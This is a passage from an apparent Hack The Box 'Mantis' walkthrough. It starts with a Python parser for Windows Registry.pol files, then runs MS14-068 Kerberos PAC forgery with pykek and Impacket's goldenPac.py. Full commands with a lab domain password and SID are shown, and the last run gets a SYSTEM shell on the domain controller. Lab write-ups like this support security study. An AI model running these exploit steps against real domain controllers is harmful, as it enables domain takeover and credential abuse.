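PREG_MAGIC = b'PReg'          # file signature, followed by a little-endian DWORD version (1)
REG_SZ, REG_EXPAND_SZ, REG_BINARY, REG_DWORD, REG_MULTI_SZ = 1, 2, 3, 4, 7


def _u16(s: str) -> bytes:
    return s.encode('utf-16-le')


def build_entry(key: str, value: str, rtype: int, data: bytes) -> bytes:
    """Encode one [key;value;type;size;data] record. Used here only to build sample input."""
    return (_u16('[') + _u16(key) + b'\x00\x00' + _u16(';')
            + _u16(value) + b'\x00\x00' + _u16(';')
            + struct.pack('<I', rtype) + _u16(';')
            + struct.pack('<I', len(data)) + _u16(';')
            + data + _u16(']'))


def _read_wstr(blob: bytes, pos: int):
    """Read a NUL-terminated UTF-16LE string at pos; return (text, position after the NUL)."""
    end = pos
    while True:
        if end + 2 > len(blob):
            raise ValueError('unterminated string at offset %d' % pos)
        if blob[end:end + 2] == b'\x00\x00':
            return blob[pos:end].decode('utf-16-le'), end + 2
        end += 2


def _expect(blob: bytes, pos: int, ch: str) -> int:
    """Consume one UTF-16LE delimiter character or fail loudly."""
    if blob[pos:pos + 2] != _u16(ch):
        raise ValueError('expected %r at offset %d' % (ch, pos))
    return pos + 2


def decode_value(rtype: int, data: bytes):
    """Turn raw registry data into a Python value where the type is known."""
    if rtype == REG_DWORD and len(data) == 4:
        return struct.unpack('<I', data)[0]
    if rtype in (REG_SZ, REG_EXPAND_SZ):
        return data.decode('utf-16-le').rstrip('\x00')
    if rtype == REG_MULTI_SZ:
        return [s for s in data.decode('utf-16-le').split('\x00') if s]
    return data  # REG_BINARY and anything unrecognised stay as bytes


def parse_registry_pol(blob: bytes) -> list:
    """Parse a Registry.pol blob into a list of {key, value, type, data} dicts."""
    if blob[:4] != PREG_MAGIC:
        raise ValueError('missing PReg signature')
    version = struct.unpack('<I', blob[4:8])[0]
    if version != 1:
        raise ValueError('unsupported Registry.pol version %d' % version)
    pos, entries = 8, []
    while pos < len(blob):
        pos = _expect(blob, pos, '[')
        key, pos = _read_wstr(blob, pos)
        pos = _expect(blob, pos, ';')
        value, pos = _read_wstr(blob, pos)
        pos = _expect(blob, pos, ';')
        rtype = struct.unpack('<I', blob[pos:pos + 4])[0]
        pos = _expect(blob, pos + 4, ';')
        size = struct.unpack('<I', blob[pos:pos + 4])[0]
        pos = _expect(blob, pos + 4, ';')
        data = blob[pos:pos + size]
        pos = _expect(blob, pos + size, ']')
        entries.append({'key': key, 'value': value, 'type': rtype,
                        'data': decode_value(rtype, data)})
    return entries


# Constructed sample (three made-up settings), NOT the contents of the real Registry.pol.
SAMPLE_POL = (
    PREG_MAGIC + struct.pack('<I', 1)
    + build_entry(r'Software\Policies\Microsoft\Windows\WindowsUpdate\AU',
                  'NoAutoUpdate', REG_DWORD, struct.pack('<I', 1))
    + build_entry(r'Software\Microsoft\Windows\CurrentVersion\Policies\System',
                  'legalnoticecaption', REG_SZ, _u16('Authorized use only') + b'\x00\x00')
    + build_entry(r'Software\Policies\Microsoft\Windows NT\DNSClient',
                  'SearchList', REG_MULTI_SZ,
                  _u16('htb.local') + b'\x00\x00' + _u16('corp.example') + b'\x00\x00' + b'\x00\x00')
)

if __name__ == '__main__':
    # Usage: python3 regpol.py Registry.pol   (no argument: parse the constructed sample)
    blob = open(sys.argv[1], 'rb').read() if len(sys.argv) > 1 else SAMPLE_POL
    for e in parse_registry_pol(blob):
        print('%s\\%s (type %d) = %r' % (e['key'], e['value'], e['type'], e['data']))
```

The strict delimiter checks are deliberate: a Registry.pol that has been hand-edited or truncated fails at a known offset instead of producing a plausible-looking but wrong setting, which matters when the output is being read for things like stored credentials or disabled security controls.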
The SID we got before (S-1-5-21-4220043660-4019079961-2895681657-1103; the RID is the last component) will be needed.
The machine is vulnerable to MS14-068 (CVE-2014-6324, fixed by KB3011780): an unpatched KDC does not properly validate the signature on the PAC in a ticket request, so any authenticated domain user can submit a forged PAC that claims Domain Admins membership and receive a ticket the DC honours. All it needs is a valid domain account and that account's SID, both of which we now have.
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
Usage:
USAGE: ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
┌──(kali㉿kali)-[~/Downloads]
└─$ wget https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS14-068/pykek/ms14-068.py
--2023-09-22 08:51:17--  https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS14-068/pykek/ms14-068.py
Resolving github.com (github.com)... 20.248.137.48
Connecting to github.com (github.com)|20.248.137.48|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46695 (46K) [text/plain]
Saving to: 'ms14-068.py'

ms14-068.py    100%[=================================================>]  45.60K  --.-KB/s    in 0.08s

2023-09-22 08:51:18 (552 KB/s) - 'ms14-068.py' saved [46695/46695]

┌──(kali㉿kali)-[~/Downloads]
└─$ cp ms14-068.py ~/HTB/mantis
The user SID we got in the previous step using rpcclient:
rpcclient $> lookupnames james
james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
rpcclient $>
I ran this script, which kept failing numerous times, and I believe it is because I am using Python 3 and it is meant for 2; even when I tried 2.7 it kept failing. Will try this later with Kali 2018.
┌──(kali㉿kali)-[~/HTB/mantis]
└─$ python2.7 ms14-068.py -u james@htb.local -p 'J@m3s_P@ssW0rd!' -d 10.10.10.52 -s S-1-5-21-4220043660-4019079961-2895681657-1103
Traceback (most recent call last):
  File "ms14-068.py", line 17, in <module>
    from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache
ImportError: No module named kek.ccache

┌──(kali㉿kali)-[~/HTB/mantis]
└─$ python ms14-068.py -u james@htb.local -p 'J@m3s_P@ssW0rd!' -d 10.10.10.52 -s S-1-5-21-4220043660-4019079961-2895681657-1103
  File "/home/kali/HTB/mantis/ms14-068.py", line 149
    print 'ERROR:', e
    ^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?

┌──(kali㉿kali)-[~/HTB/mantis]
└─$ python2 ms14-068.py -u james@htb.local -p 'J@m3s_P@ssW0rd!' -d 10.10.10.52 -s S-1-5-21-4220043660-4019079961-2895681657-1103
Traceback (most recent call last):
  File "ms14-068.py", line 17, in <module>
    from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache
ImportError: No module named kek.ccache

Two different failures are mixed here: the python (3) run dies on the Python 2 print syntax, but both Python 2 runs die on the ImportError for kek.ccache. The script imports its kek/ package from the same pykek directory, and only the single ms14-068.py file was downloaded above, so the whole pykek directory (ms14-068.py plus kek/) is needed for it to run under Python 2.
Tried goldenPac.py. It does the same MS14-068 forged-PAC ticket request, then uses the resulting ticket PSExec-style: upload a service binary to ADMIN$, create and start a service, and hand back a SYSTEM shell on the DC.
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./goldenPac.py htb.local/james:J@m3s_P@ssW0rd\[email protected]
Impacket v0.11.0 - Copyright 2023 Fortra

[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file gHZVxsPx.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service VAjq on mantis.htb.local.....
[*] Starting service VAjq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>
C:\>cd users
C:\Users>cd admi
b'The system cannot find the path specified.\r\n'
C:\Users>cd administrator
C:\Users\Administrator>cd desktop
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 3292-4936

 Directory of C:\Users\Administrator\Desktop

02/08/2021  01:44 PM    <DIR>          .
02/08/2021  01:44 PM    <DIR>          ..
09/22/2023  09:36 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   3,841,724,416 bytes free

C:\Users\Administrator\Desktop>type root.txt
ccada3f6a7bfe7c33068a653a56c51de
C:\Users\Administrator\Desktop>